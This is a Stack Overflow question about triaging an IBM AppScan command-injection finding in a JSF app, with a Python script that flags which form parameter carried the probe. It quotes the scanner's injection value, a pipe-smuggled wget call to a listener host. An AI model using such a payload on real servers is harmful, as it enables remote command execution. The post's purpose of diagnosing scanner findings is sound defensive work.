Question
Original Post: IBM AppScan. We recently received results from IBM AppScan DAST and some of the results don't make much sense.
Parameter: **javax.faces.source**
Risk(s): It is possible to run remote commands on the web server. This usually means complete compromise of the server and its contents
Fix: Set the "uri" attribute of the "domain" entity in the clientaccesspolicy.xml file to include specific domain names instead of any domain.
The following changes were applied to the original request:
Set the value of the parameter 'form:F_16275_1_input' to
'%22%7Cwget+http%3A%2F%2F--AppScanLocalIpAddress--%3A--AppScanLocalPortNum--%2FAppScanMsg.html%3FvarId%3D13314%7Cecho+%22'
Request/Response:
POST /***/itemliststatus.xhtml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
Connection: keep-alive
Faces-Request: partial/ajax
X-Requested-With: XMLHttpRequest
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-
javax.faces.partial.ajax=true&javax.faces.source=form%3AbuttontextSearch&javax.faces.partial.execute=form&javax.faces.partial.render=j_idt17+unreadCountForm+j_idt22+menuform+messagingAppForm+form+formDialog&form%3AbuttontextSearch=form%3AbuttontextSearch&form=form&form%3AF_16275_0=12375541&form%3AF_16275_1_input=%22%7Cwget+http%3A%2F%2F********%3A55016%2FAppScanMsg.html%3FvarId%3D13314%7Cecho+%22&form%3AF_16275_2_input=&form%3AF_16275_3_input=&form%3AF_16275_4_input=&form%3AF_16275_5_focus=&form%3AF_16275_5_input=&form
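To triage a finding like this, it helps to decode the request body and see which parameter actually carried the scanner's port-listener probe (the finding names `javax.faces.source`, while the modified parameter is `form:F_16275_1_input`). The following is an added example, not code from the post or from AppScan; the sample body is copied from the request above (trimmed, with the host masked as in the post), and the function and marker names are my own.

```python
from urllib.parse import parse_qsl

# Request body taken from the post above (trimmed; the scanner host is masked there as ********).
SAMPLE_BODY = (
    "javax.faces.partial.ajax=true&javax.faces.source=form%3AbuttontextSearch"
    "&javax.faces.partial.execute=form&form%3AbuttontextSearch=form%3AbuttontextSearch"
    "&form=form&form%3AF_16275_0=12375541"
    "&form%3AF_16275_1_input=%22%7Cwget+http%3A%2F%2F********%3A55016"
    "%2FAppScanMsg.html%3FvarId%3D13314%7Cecho+%22"
    "&form%3AF_16275_2_input=&form%3AF_16275_3_input="
)

# Shell metacharacters that distinguish a command-injection probe from ordinary form input.
SHELL_METACHARS = ("|", ";", "`", "$(", "&&")
# Names AppScan uses for its callback page / listener placeholders (seen in the finding text).
SCANNER_MARKERS = ("AppScanMsg", "AppScanLocalIpAddress")


def decode_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded JSF POST body into {name: value}.

    parse_qsl turns form%3AF_16275_1_input into form:F_16275_1_input and '+' into spaces,
    so JSF client ids come back in the form the server sees them.
    """
    return dict(parse_qsl(body, keep_blank_values=True))


def flag_probe_params(body: str) -> list:
    """Return the parameter names whose decoded value carries the AppScan injection probe.

    A value is flagged only when it contains both a shell metacharacter and a scanner marker,
    so legitimate values that merely contain '|' are not reported.
    """
    hits = []
    for name, value in decode_body(body).items():
        has_meta = any(m in value for m in SHELL_METACHARS)
        has_marker = any(s in value for s in SCANNER_MARKERS)
        if has_meta and has_marker:
            hits.append(name)
    return hits


def finding_matches_request(reported_param: str, body: str) -> bool:
    """True if the parameter named in the finding is one that actually carried the probe."""
    return reported_param in flag_probe_params(body)


if __name__ == "__main__":
    print("probe carried by:", flag_probe_params(SAMPLE_BODY))
    print("finding names javax.faces.source, which carried the probe:",
          finding_matches_request("javax.faces.source", SAMPLE_BODY))
```

Running this shows the probe landed in `form:F_16275_1_input` while the finding names `javax.faces.source`, which is the mismatch to raise with the scan's reviewer before treating it as a server-side command injection.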
Source: https://stackoverflow.com/questions/61705693/ibm-appscan-port-listener-command-injection-jsf-2-2-primefaces-jboss-7-2